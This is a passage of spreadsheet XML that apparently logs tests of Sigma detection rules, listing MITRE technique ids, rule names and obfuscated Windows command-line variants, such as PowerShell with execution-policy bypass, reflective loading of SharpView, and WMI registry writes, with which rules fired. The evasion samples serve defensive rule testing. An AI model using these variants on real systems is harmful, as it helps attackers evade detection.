      <c r="C1292" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1292" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1292" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1292" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1292" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1292" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1293" ht="15.75" customHeight="1" s="42">
      <c r="A1293" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1293" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1293" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1293" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1293" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1293" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1293" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1293" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1294" ht="15.75" customHeight="1" s="42">
      <c r="A1294" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1294" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1294" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1294" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1294" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1294" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1294" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1294" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1294" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1294" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1295" ht="15.75" customHeight="1" s="42">
      <c r="A1295" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1295" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1295" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1295" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1295" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1295" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1295" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1295" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1296" ht="15.75" customHeight="1" s="42">
      <c r="A1296" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1296" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1296" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1296" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1296" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1296" s="36" t="n"/>
      <c r="J1296" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1296" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1297" ht="15.75" customHeight="1" s="42">
      <c r="A1297" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1297" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1297" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1297" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1297" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1297" s="43" t="n"/>
      <c r="J1297" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1297" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1298" ht="15.75" customHeight="1" s="42">
      <c r="A1298" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1298" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1298" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1298" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1298" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1298" s="43" t="n"/>
      <c r="J1298" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1298" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1299" ht="15.75" customHeight="1" s="42">
      <c r="A1299" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1299" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1299" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1299" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1299" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1299" s="43" t="n"/>
      <c r="J1299" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1299" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1300" ht="15.75" customHeight="1" s="42">
      <c r="A1300" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1300" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1300" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1300" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1300" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1300" s="43" t="n"/>
      <c r="J1300" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1300" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1301" ht="15.75" customHeight="1" s="42">
      <c r="A1301" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1301" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1301" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1301" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1301" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1301" s="43" t="n"/>
      <c r="J1301" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1301" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1302" ht="15.75" customHeight="1" s="42">
      <c r="A1302" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1302" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1302" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1302" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1302" s="43" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1302" s="43" t="n"/>
      <c r="J1302" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1302" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1303" ht="15.75" customHeight="1" s="42">
      <c r="A1303" s="36" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1303" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1303" s="36" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1303" s="36" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1303" s="43" t="inlineStr">
        <is>
          <t>fsutil fsinfo dri""ves</t>
        </is>
      </c>
      <c r="F1303" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1303" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1303" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1303" s="43" t="n"/>
      <c r="J1303" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1303" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1304" ht="15.75" customHeight="1" s="42">
      <c r="A1304" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1304" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1304" s="36" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1304" s="36" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1304" s="36" t="inlineStr">
        <is>
          <t>fsutil fsinfo drives</t>
        </is>
      </c>
      <c r="F1304" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1304" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1304" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1304" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1305" ht="15.75" customHeight="1" s="42">
      <c r="A1305" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1305" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1305" s="36" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1305" s="36" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1305" s="36" t="inlineStr">
        <is>
          <t>net.exe "ti""me" \\localhost</t>
        </is>
      </c>
      <c r="F1305" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1305" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1305" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165)</t>
        </is>
      </c>
      <c r="J1305" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1305" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1306" ht="15.75" customHeight="1" s="42">
      <c r="A1306" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1306" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1306" s="36" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1306" s="36" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1306" s="36" t="inlineStr">
        <is>
          <t>w32tm /t""z</t>
        </is>
      </c>
      <c r="F1306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1306" s="43" t="n"/>
      <c r="J1306" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1306" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1307" ht="15.75" customHeight="1" s="42">
      <c r="A1307" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1307" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1307" s="36" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1307" s="36" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1307" s="36" t="inlineStr">
        <is>
          <t>W32tm  -stripchart -computer:localhost -period:5 -dataonly -samples:2</t>
        </is>
      </c>
      <c r="F1307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1307" s="43" t="n"/>
      <c r="J1307" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1307" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1308" ht="15.75" customHeight="1" s="42">
      <c r="A1308" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1308" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1308" s="36" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1308" s="36" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1308" s="36" t="inlineStr">
        <is>
          <t>W32tm  "/stripchart" "/computer:localhost" "/period:5" "/dataonly" "/samples:2"</t>
        </is>
      </c>
      <c r="F1308" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1308" s="43" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer (6da2c9f5-7c53-401b-aacb-92c040ce1215)</t>
        </is>
      </c>
      <c r="J1308" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1308" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1309" ht="15.75" customHeight="1" s="42">
      <c r="A1309" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1309" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1309" s="36" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1309" s="36" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1309" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\explorer.exe %temp%\file_manager.exe &amp;&amp; %temp%\file_manager.exe shell:mycomputerfolder</t>
        </is>
      </c>
      <c r="F1309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1309" s="43" t="n"/>
      <c r="J1309" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1309" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1310" ht="15.75" customHeight="1" s="42">
      <c r="A1310" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1310" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1310" s="36" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1310" s="36" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1310" s="36" t="inlineStr">
        <is>
          <t>explorer.exe ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}</t>
        </is>
      </c>
      <c r="F1310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1310" s="43" t="n"/>
      <c r="J1310" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1310" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1311" ht="15.75" customHeight="1" s="42">
      <c r="A1311" s="43" t="n"/>
      <c r="B1311" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1311" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1311" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1311" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Notepad.exe</t>
        </is>
      </c>
      <c r="F1311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1311" s="36" t="n"/>
      <c r="J1311" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1311" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1312" ht="15.75" customHeight="1" s="42">
      <c r="A1312" s="43" t="n"/>
      <c r="B1312" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1312" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1312" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1312" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1312" s="43" t="n"/>
      <c r="J1312" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1312" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1313" ht="15.75" customHeight="1" s="42">
      <c r="A1313" s="43" t="n"/>
      <c r="B1313" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1313" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1313" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1313" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1313" s="43" t="n"/>
      <c r="J1313" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1313" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1314" ht="15.75" customHeight="1" s="42">
      <c r="A1314" s="43" t="n"/>
      <c r="B1314" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1314" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1314" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1314" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1314" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1314" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1314" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1314" s="43" t="n"/>
      <c r="J1314" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1314" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1315" ht="15.75" customHeight="1" s="42">
      <c r="A1315" s="43" t="n"/>
      <c r="B1315" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1315" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1315" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1315" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1315" s="43" t="n"/>
      <c r="J1315" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1315" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1316" ht="15.75" customHeight="1" s="42">
      <c r="A1316" s="43" t="n"/>
      <c r="B1316" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1316" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1316" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1316" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1316" s="43" t="n"/>
      <c r="J1316" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1316" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1317" ht="15.75" customHeight="1" s="42">
      <c r="A1317" s="43" t="n"/>
      <c r="B1317" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1317" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1317" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1317" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1317" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1317" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1317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17" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1317" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1318" ht="15.75" customHeight="1" s="42">
      <c r="A1318" s="43" t="n"/>
      <c r="B1318" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1318" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1318" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1318" s="36" t="inlineStr">
        <is>
